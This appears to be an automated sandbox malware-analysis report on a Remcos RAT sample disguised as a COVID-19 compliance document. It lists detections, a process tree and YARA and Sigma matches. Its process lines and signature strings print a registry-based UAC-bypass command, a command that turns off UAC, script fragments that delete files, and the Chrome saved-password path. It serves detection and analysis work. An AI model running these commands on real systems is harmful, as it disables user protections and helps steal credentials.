
Analysis Report Customer Report on COVID-19 Non-Complaince. Doc.exe

Overview

General Information

Sample Name: Customer Report on COVID-19 Non-Complaince. Doc.exe
Analysis ID: 295956
MD5: 949409e8ecfaf8ae46bd325c7b5b9f8d
SHA1: 2d4dd1f218791e433693601fa0df94cd3639b629
SHA256: 5b1f1843bbb992e3d5c635aa69d8409de4ae4d3f04cf19994d8e953e99cf451a
Tags: COVID19, exe, geo, ZAF

Most interesting Screenshot:

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Fodhelper UAC Bypass
Yara detected Remcos RAT
Allocates memory in foreign processes
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read data from the clipboard
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate processes and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

Startup

  • System is w10x64
  • Customer Report on COVID-19 Non-Complaince. Doc.exe (PID: 6672 cmdline: 'C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe' MD5: 949409E8ECFAF8AE46BD325C7B5B9F8D)
    • notepad.exe (PID: 468 cmdline: C:\Windows\System32\Notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
      • cmd.exe (PID: 1240 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6876 cmdline: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
      • cmd.exe (PID: 6852 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ieinstal.exe (PID: 1496 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • Xbuhnek.exe (PID: 3620 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe' MD5: 949409E8ECFAF8AE46BD325C7B5B9F8D)
    • ieinstal.exe (PID: 1004 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • Xbuhnek.exe (PID: 7040 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe' MD5: 949409E8ECFAF8AE46BD325C7B5B9F8D)
    • ieinstal.exe (PID: 4944 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\hubX.url
Rule: Methodology_Shortcut_HotKey
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x9c:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]

Source: C:\Users\user\AppData\Local\hubX.url
Rule: Methodology_Contains_Shortcut_OtherURIhandlers
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Source: C:\Users\user\AppData\Local\hubX.url
Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x71:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source: 00000014.00000002.420518923.0000000010540000.00000040.00000001.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 00000014.00000002.420518923.0000000010540000.00000040.00000001.sdmp
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x1825f:$str_a1: C:\Windows\System32\cmd.exe
  • 0x1827b:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x1827b:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x17963:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x17f67:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x17547:$str_b2: Executing file:
  • 0x182ff:$str_b3: GetDirectListeningPort
  • 0x17da7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x1809b:$str_b5: licence_code.txt
  • 0x18003:$str_b6: \restart.vbs
  • 0x17f27:$str_b8: \uninstall.vbs
  • 0x174d3:$str_b9: Downloaded file:
  • 0x174ff:$str_b10: Downloading file:
  • 0x171f7:$str_b11: KeepAlive Enabled! Timeout: %i seconds
  • 0x17563:$str_b12: Failed to upload file:
  • 0x1833f:$str_b13: StartForward
  • 0x18323:$str_b14: StopForward
  • 0x17e97:$str_b15: fso.DeleteFile "
  • 0x17efb:$str_b16: On Error Resume Next
  • 0x17e63:$str_b17: fso.DeleteFolder "
  • 0x1757b:$str_b18: Uploaded file:

Source: 00000017.00000002.435351745.0000000010540000.00000040.00000001.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 00000017.00000002.435351745.0000000010540000.00000040.00000001.sdmp
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x1825f:$str_a1: C:\Windows\System32\cmd.exe
  • 0x1827b:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x1827b:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x17963:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x17f67:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x17547:$str_b2: Executing file:
  • 0x182ff:$str_b3: GetDirectListeningPort
  • 0x17da7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x1809b:$str_b5: licence_code.txt
  • 0x18003:$str_b6: \restart.vbs
  • 0x17f27:$str_b8: \uninstall.vbs
  • 0x174d3:$str_b9: Downloaded file:
  • 0x174ff:$str_b10: Downloading file:
  • 0x171f7:$str_b11: KeepAlive Enabled! Timeout: %i seconds
  • 0x17563:$str_b12: Failed to upload file:
  • 0x1833f:$str_b13: StartForward
  • 0x18323:$str_b14: StopForward
  • 0x17e97:$str_b15: fso.DeleteFile "
  • 0x17efb:$str_b16: On Error Resume Next
  • 0x17e63:$str_b17: fso.DeleteFolder "
  • 0x1757b:$str_b18: Uploaded file:

Source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

(13 further entries not shown)

Unpacked PEs

Source: 23.2.ieinstal.exe.10540000.2.raw.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 23.2.ieinstal.exe.10540000.2.raw.unpack
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x1825f:$str_a1: C:\Windows\System32\cmd.exe
  • 0x1827b:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x1827b:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x17963:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x17f67:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x17547:$str_b2: Executing file:
  • 0x182ff:$str_b3: GetDirectListeningPort
  • 0x17da7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x1809b:$str_b5: licence_code.txt
  • 0x18003:$str_b6: \restart.vbs
  • 0x17f27:$str_b8: \uninstall.vbs
  • 0x174d3:$str_b9: Downloaded file:
  • 0x174ff:$str_b10: Downloading file:
  • 0x171f7:$str_b11: KeepAlive Enabled! Timeout: %i seconds
  • 0x17563:$str_b12: Failed to upload file:
  • 0x1833f:$str_b13: StartForward
  • 0x18323:$str_b14: StopForward
  • 0x17e97:$str_b15: fso.DeleteFile "
  • 0x17efb:$str_b16: On Error Resume Next
  • 0x17e63:$str_b17: fso.DeleteFolder "
  • 0x1757b:$str_b18: Uploaded file:

Source: 23.2.ieinstal.exe.10540000.2.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 23.2.ieinstal.exe.10540000.2.unpack
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x1765f:$str_a1: C:\Windows\System32\cmd.exe
  • 0x1767b:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x1767b:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x16d63:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x17367:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x16947:$str_b2: Executing file:
  • 0x176ff:$str_b3: GetDirectListeningPort
  • 0x171a7:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x1749b:$str_b5: licence_code.txt
  • 0x17403:$str_b6: \restart.vbs
  • 0x17327:$str_b8: \uninstall.vbs
  • 0x168d3:$str_b9: Downloaded file:
  • 0x168ff:$str_b10: Downloading file:
  • 0x165f7:$str_b11: KeepAlive Enabled! Timeout: %i seconds
  • 0x16963:$str_b12: Failed to upload file:
  • 0x1773f:$str_b13: StartForward
  • 0x17723:$str_b14: StopForward
  • 0x17297:$str_b15: fso.DeleteFile "
  • 0x172fb:$str_b16: On Error Resume Next
  • 0x17263:$str_b17: fso.DeleteFolder "
  • 0x1697b:$str_b18: Uploaded file:

Source: 20.2.ieinstal.exe.10540000.2.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

(25 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Fodhelper UAC Bypass
Source: Process started
Author: Joe Security
Data:
  • Command: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
  • CommandLine: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
  • CommandLine|base64offset|contains: DA
  • Image: C:\Windows\SysWOW64\reg.exe
  • NewProcessName: C:\Windows\SysWOW64\reg.exe
  • OriginalFileName: C:\Windows\SysWOW64\reg.exe
  • ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
  • ParentImage: C:\Windows\SysWOW64\cmd.exe
  • ParentProcessId: 1240
  • ProcessCommandLine: REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
  • ProcessId: 6876

              Signature Overview

              AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe, ReversingLabs: Detection: 10%
Multi AV Scanner detection for submitted file
Source: Customer Report on COVID-19 Non-Complaince. Doc.exe, ReversingLabs: Detection: 10%
Yara detected Remcos RAT
Source: Yara match, File source: 00000014.00000002.420518923.0000000010540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.435351745.0000000010540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000017.00000002.433986384.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.498610658.0000000010540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.413656142.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: ieinstal.exe PID: 4944, type: MEMORY
Source: Yara match, File source: Process Memory Space: ieinstal.exe PID: 1004, type: MEMORY
Source: Yara match, File source: Process Memory Space: ieinstal.exe PID: 1496, type: MEMORY
Source: Yara match, File source: 23.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 23.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 12.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 23.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 23.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 12.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 23.2.ieinstal.exe.10540000.2.unpack, Avira: Label: TR/Crypt.Morphine.Gen
Source: 23.2.ieinstal.exe.400000.0.unpack, Avira: Label: BDS/Backdoor.Gen
Source: 12.2.ieinstal.exe.400000.0.unpack, Avira: Label: BDS/Backdoor.Gen
Source: 20.2.ieinstal.exe.10540000.2.unpack, Avira: Label: TR/Crypt.Morphine.Gen
Source: 20.2.ieinstal.exe.400000.0.unpack, Avira: Label: BDS/Backdoor.Gen
Source: 12.2.ieinstal.exe.10540000.2.unpack, Avira: Label: TR/Crypt.Morphine.Gen
Source: C:\Windows\SysWOW64\notepad.exe, Code function: 6_2_5048518C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_5048518C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe, Code function: 12_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00404C0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe, Code function: 12_2_0040751B ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040751B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe, Code function: 12_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t12_2_00410586
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe, Code function: 12_2_0040728F ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basi